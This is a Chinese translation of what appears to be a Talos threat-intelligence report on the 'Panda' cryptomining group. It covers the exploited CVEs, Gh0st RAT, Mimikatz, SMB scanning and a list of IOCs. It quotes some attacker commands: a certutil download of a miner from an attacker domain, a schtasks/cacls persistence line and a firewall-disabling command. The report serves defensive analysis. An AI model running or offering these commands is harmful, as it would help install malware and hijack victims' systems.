摘要

2018年中旬，Talos安全团队在“MassMiner”挖矿活动（MassMiner是一个挖矿恶意软件家族，通过大量不同的漏洞进行传播，还暴力攻击Microsoft SQL Server）中注意到一个名为“Panda”的新威胁团伙。

“Panda”所使用的技术工具并不复杂，无外乎是远程访问工具（RAT）和非法挖矿软件，却是我们看到的最活跃的攻击者之一，迄今为止已经创造了价值数十万美元的加密货币，另外值得注意的是他们的行为——在全球范围内持续利用着易受攻击的web应用程序，而遍历网络的工具和对RAT的使用，也意味着全世界的组织都面临着将其系统资源滥用于挖矿的风险，甚至更糟，比如泄露价值信息等。

Panda经常更新他们的基础设施、漏洞利用和payload，影响范围包括银行、医疗保健、交通、电信和IT服务等行业的组织机构。

首次发现“Panda”

2018年7月，我们首次观察到了“Panda”威胁组织，其攻击流程是先使用massscan寻找各种易受攻击的服务器，然后利用几种不同的漏洞，比如WebLogic漏洞（CVE-2017-10271）和Apache Struts 2中的远程代码执行漏洞（CVE-2017-5638），通过PowerShell post-exploit下载名为“downloader.exe”的挖矿软件payload，并将其以简单的数字命名（例如“13.exe”）保存在TEMP文件夹中，之后再执行。我们观测到的样本是通过通过端口57890从list[.]idc3389[.]top或kingminer[.]club.中下载配置文件的，配置文件里指定了要使用的门罗币钱包及矿池。截止目前，我们预估Panda从中获取的利润，按当前美元来算的话应该有十万。

到了2018年10月，list[.]idc3389[.]top上的配置文件的下载量已经超过30万次。

样本同时还会安装Gh0st RAT，它与rat[.]kingminer[.]club进行通信。在另外一些变体中，我们还观察到一些其他的黑客工具和漏洞利用的植入，包括凭证盗窃工具Mimikatz和方程式组织（Equation Group）的UPX加壳工具。样本还会通过端口445到172.105.X.X块中的IP地址扫描开放的SMB端口。

idc3389[.]top是Panda的C2域之一，由一位说中文的参与人注册，他的名字正是“Panda”。

与Bulehero的联系

首次发现Panda攻击的同一时间，在另一个C2域bulehero [.] in中我们观察到非常相似的TTP。攻击者使用PowerShell从b[.]bulehero[.]in中下载名为“download.exe”的文件，同样将其保存为以简单数字命名的文件（如“13.exe”）并执行。

在沙箱环境中，我们观察了几个将它关联到早期MassMiner活动的特征。首先，它通过先前观察到的端口57890，GET请求一个名为cfg.ini的文件，该文件托管在bulehero[.]in的一个子域上：c[.]bulehero[.]in。与MassMiner一致，配置文件指定原始样本所来自的站点，以及用于采矿的钱包和矿池。

此外，样本会试图使用诸如“cmd / c net stop MpsSvc”之类的命令关闭受害者的防火墙。恶意软件还会修改访问控制列表，通过运行cacsl.exe授予某些文件的完全访问权限。

例如：

cmd / c schtasks / create / sc minute / mo 1 / tn“Netframework”/ ru system / tr“cmd / c echo Y | cacls C：Windowsappveif.exe / p everyone：F

而在先前的MassMiner感染中也观察到这两种行为。

样本还会向ip138 [.] com发出GET请求名为ic.asp的资源，此ip地理定位为中文，该资源以中文的形式提供机器的IP地址和位置，而在MassMiner活动中也观察到了此行为。

此外，appveif.exe会在系统目录中创建许多文件，其中许多文件被多个AV引擎确定为恶意文件，并且似乎与MassMiner活动中的漏洞利用相匹配。例如我们检测到几个工具都与“Shadow Brokers”组织的漏洞利用相关，而且这些文件都安装在一个具有可疑名称的目录中：“WindowsInfusedAppeEternalblue139specials”。

“Panda”的进化

在2019年1月，Talos观察到Panda利用ThinkPHP网络框架中最新披露的一个漏洞（CNVD-2018-24942）来传播类似的恶意软件。

ThinkPHP是一个在中国流行的开源Web框架，利用此漏洞，可直接从a46[.]bulehero[.]in中下载“download.exe”。Panda还将一个简单的PHP Web shell上传到路径“/public/hydra.php”，用于调用PowerShell来下载相同的可执行文件。web shell仅提供了通过对“/public/hydra.php”HTTP请求中的URL参数调用任意系统命令的能力。Download.exe将下载非法挖矿软件payload，并有SMB扫描的行为，这是Panda横向移动的证明。

2019年3月，Panda更换了新的基础设施，包括域hognoob[.]se的各个子域。当时托管初始payload的域fid[.]hognoob[.]se，解析为IP地址195[.]128[.]126[.]241，也与bulehero[.]in的几个子域相关联。

3月时Panda的TTP与之前的相似。漏洞利用后，Panda调用PowerShell从URL hxxp://fid[.]hognoob[.]se/download.exe下载名为“download.exe”的可执行文件，并将其保存在Temp文件夹中，不过文件名相较之前要变得复杂许多，如“autzipmfvidixxr7407.exe”；之后此文件再从fid[.]hognoob[.]se下载名为“wercplshost.exe”的挖矿木马和从uio[.]hognoob[.]se下载配置文件“cfg.ini”。

“Wercplshost.exe”包含为横向移动而设计的漏洞利用模块，其中许多都与“Shadow Brokers”有关，还包含SMB暴力破解。能获取受害者的内部IP，并以受害者的B类地址作为端口扫描的基础，向中文IP地理位置站点2019[.]ip138[.]com获取外部IP。它还使用开源工具Mimikatz来收集受害者的密码。

此后不久，Panda开始更新了其payload，包含了一些新的功能，比如使用Certutil通过以下命令下载次级矿机payload：

certutil.exe -urlcache -split -f http://fid[.]hognoob[.]se/upnpprhost.exe C:WindowsTempupnpprhost.exe

矿机运行的命令如下：

cmd /c ping 127.0.0.1 -n 5 & Start C:Windowsugrpkute[filename].exe

更新后的payload安装WinPcap和开源工具Masscan来扫描公共IP地址上的开放端口，并将结果保存为“Scant.txt”（注意拼写是错误的），还将硬编码IP范围列表写入“ip.txt”，再将其传递给Masscan以扫描端口445，最后将结果保存到“results.txt”中。鉴于攻击者有使用EternalBlue的历史，此举的目的可能是为了找到易受MS17-010影响的机器。更新的payload在漏洞利用模块上没有变化，也还是使用Mimikatz来收集受害者密码。

6月，Panda开始针对较新的WebLogic漏洞CVE-2019-2725，但策略依然不变。

近期活动

在过去的一个月里，Panda开始采用新的C2和托管payload的设备。我们观察到攻击者从hxxp[:]//wiu[.]fxxxxxxk[.]me/download.exe中下载payload并将其保存为随机的20个字符的名称，前15个字符由a到z组成，最后五个由数字组成（如“xblzcdsafdmqslz19595.exe”），再通过PowerShell执行此文件。Wiu[.]fxxxxxxk[.]me解析为IP 3[.]123[.]17[.]223，与Panda的旧C2 ，如a46[.]bulehero[.]in和 fid[.]hognoob[.]se相关联。

除了新的基础设施，payload与他们在2019年5月开始使用的payload相似，包括使用Certutil下载位于hxxp[:]//wiu[.]fxxxxxxk[.]me/sppuihost.exe 的次级矿机payload，以及使用ping来延迟执行payload。该样本还包括Panda以往的横向移动模块、Shadow Brokers的漏洞利用和Mimikatz。

区别是，新样本中包含Gh0st RAT默认互斥锁“DOWNLOAD_SHELL_MUTEX_NAME”，互斥锁名称列为fxxk[.]noilwut0vv[.]club:9898；还向IP 46[.]173[.]217[.]80发出DNS请求，此IP也与fxxxxxxk[.]me和hognoob[.]se的几个子域相关联。而挖矿行为和Gh0st RAT的结合，也代表着Panda早期行为的回归。

2019年8月19日，我们观察到Panda在C2和payload托管设备存中添加了另一组域。与之前的活动一致，攻击者IP从URL hxxp[:]//cb[.]f*ckingmy[.]life/download.exe中下载payload，但文件不再保存为随机的20个字符的名称，而是“BBBBB”，域目前解析为217[.]69[.]6[.]42。

初始payload使用Certutil下载位于http[:]//cb[.]fuckingmy[.]life:80/trapceapet.exe上的次级矿机payload，有一个设置为“oo[.]mygoodluck[.]best:51888:WervPoxySvc”的Gh0st RAT互斥锁，并为解析为46[.]173[.]217[.]80的域发出DNS请求，其中包含fxxxxxxk[.]me和hognoob[.]se的多个子域，这两个子域都是Panda使用的已知域，新样本还连接了li[.]bulehero2019[.]club。

同样，新样本中也包含了Panda以往的横向移动模块、Shadow Brokers的漏洞利用和Mimikatz，还有用于矿机配置的INI文件，列出了矿池mi[.]oops[.]best和备份矿池mx[.]oops[.]best。

结论

Panda的运营安全性算是较差的，许多旧域和新域都托管在同一个IP上，并且他们的TTP在活动中保持了高度相似性，payload也不是很复杂。

但是，我们还是不应低估威胁行为者通过一些广泛分布的工具（如Mimikatz）所造成的损害和影响。Panda使用的文件服务器也表明，这种恶意软件具有广泛的影响力。我们对Panda的收益进行了粗略计算，约有1,215 XMR，换算成美元大约为10万美元。

Panda依然是当前参与非法挖矿行动的最活跃的行动者之一，且经常改变基础设备和利用各种不同漏洞，在公共POC可用后不久又很快开始利用起了已知漏洞，对那些不常更新的用户而言无疑是一种安全隐患，而且，如果Panda能够感染受害者系统，那么另一个威胁行为者可以使用相同的感染方式来传递其他恶意软件。

Talos将对Panda的活动保持继续监控。

IOCs

· 域

a45[.]bulehero[.]in

a46[.]bulehero[.]in

a47[.]bulehero[.]in

a48[.]bulehero[.]in

a88[.]bulehero[.]in

a88[.]heroherohero[.]info

a[.]bulehero[.]in

aic[.]fxxxxxxk[.]me

axx[.]bulehero[.]in

b[.]bulehero[.]in

bulehero[.]in

c[.]bulehero[.]in

cb[.]fuckingmy[.].life

cnm[.]idc3389[.]top

down[.]idc3389[.]top

fid[.]hognoob[.]se

fxxk[.]noilwut0vv[.]club

haq[.]hognoob[.]se

idc3389[.]top

idc3389[.]cc

idc3389[.]pw

li[.]bulehero2019[.]club

list[.]idc3389[.]top

mi[.]oops[.]best

mx[.]oops[.]best

nrs[.]hognoob[.]se

oo[.]mygoodluck[.]best

pool[.]bulehero[.]in

pxi[.]hognoob[.]se

pxx[.]hognoob[.]se

q1a[.]hognoob[.]se

qie[.]fxxxxxxk[.]me

rp[.]oiwcvbnc2e[.]stream

uio[.]heroherohero[.]info

uio[.]hognoob[.]se

upa1[.]hognoob[.]se

upa2[.]hognoob[.]se

wiu[.]fxxxxxxk[.]me

yxw[.]hognoob[.]se

zik[.]fxxxxxxk[.]me

· IP

184[.]168[.]221[.]47

172[.]104[.]87[.]6

139[.]162[.]123[.]87

139[.]162[.]110[.]201

116[.]193[.]154[.]122

95[.]128[.]126[.]241

195[.]128[.]127[.]254

195[.]128[.]126[.]120

195[.]128[.]126[.]243

195[.]128[.]124[.]140

139[.]162[.]71[.]92

3[.]123[.]17[.]223

46[.]173[.]217[.]80

5[.]56[.]133[.]246

· SHA-256

2df8cfa5ea4d63615c526613671bbd02cfa9ddf180a79b4e542a2714ab02a3c1

fa4889533cb03fc4ade5b9891d4468bac9010c04456ec6dd8c4aba44c8af9220

2f4d46d02757bcf4f65de700487b667f8846c38ddb50fbc5b2ac47cfa9e29beb

829729471dfd7e6028af430b568cc6e812f09bb47c93f382a123ccf3698c8c08

8b645c854a3bd3c3a222acc776301b380e60b5d0d6428db94d53fad6a98fc4ec

1e4f93a22ccbf35e2f7c4981a6e8eff7c905bc7dbb5fedadd9ed80768e00ab27

0697127fb6fa77e80b44c53d2a551862709951969f594df311f10dcf2619c9d5

f9a972757cd0d8a837eb30f6a28bc9b5e2a6674825b18359648c50bbb7d6d74a

34186e115f36584175058dac3d34fe0442d435d6e5f8c5e76f0a3df15c9cd5fb

29b6dc1a00fea36bc3705344abea47ac633bc6dbff0c638b120d72bc6b38a36f

3ed90f9fbc9751a31bf5ab817928d6077ba82113a03232682d864fb6d7c69976

a415518642ce4ad11ff645151195ca6e7b364da95a8f89326d68c836f4e2cae1

4d1f49fac538692902cc627ab7d9af07680af68dd6ed87ab16710d858cc4269c

8dea116dd237294c8c1f96c3d44007c3cd45a5787a2ef59e839c740bf5459f21

991a9a8da992731759a19e470c36654930f0e3d36337e98885e56bd252be927e

a3f1c90ce5c76498621250122186a0312e4f36e3bfcfede882c83d06dd286da1

9c37a6b2f4cfbf654c0a5b4a4e78b5bbb3ba26ffbfab393f0d43dad9000cb2d3

d5c1848ba6fdc6f260439498e91613a5db8acbef10d203a18f6b9740d2cab3ca

29b6dc1a00fea36bc3705344abea47ac633bc6dbff0c638b120d72bc6b38a36f

6d5479adcfa4c31ad565ab40d2ea8651bed6bd68073c77636d1fe86d55d90c8d

· 门罗币钱包

49Rocc2niuCTyVMakjq7zU7njgZq3deBwba3pTcGFjLnB2Gvxt8z6PsfEn4sc8WPPedTkGjQVHk2RLk7btk6Js8gKv9iLCi 1198.851653275126

4AN9zC5PGgQWtg1mTNZDySHSS79nG1qd4FWA1rVjEGZV84R8BqoLN9wU1UCnmvu1rj89bjY4Fat1XgEiKks6FoeiRi1EHhh

44qLwCLcifP4KZfkqwNJj4fTbQ8rkLCxJc3TW4UBwciZ95yWFuQD6mD4QeDusREBXMhHX9DzT5LBaWdVbsjStfjR9PXaV9L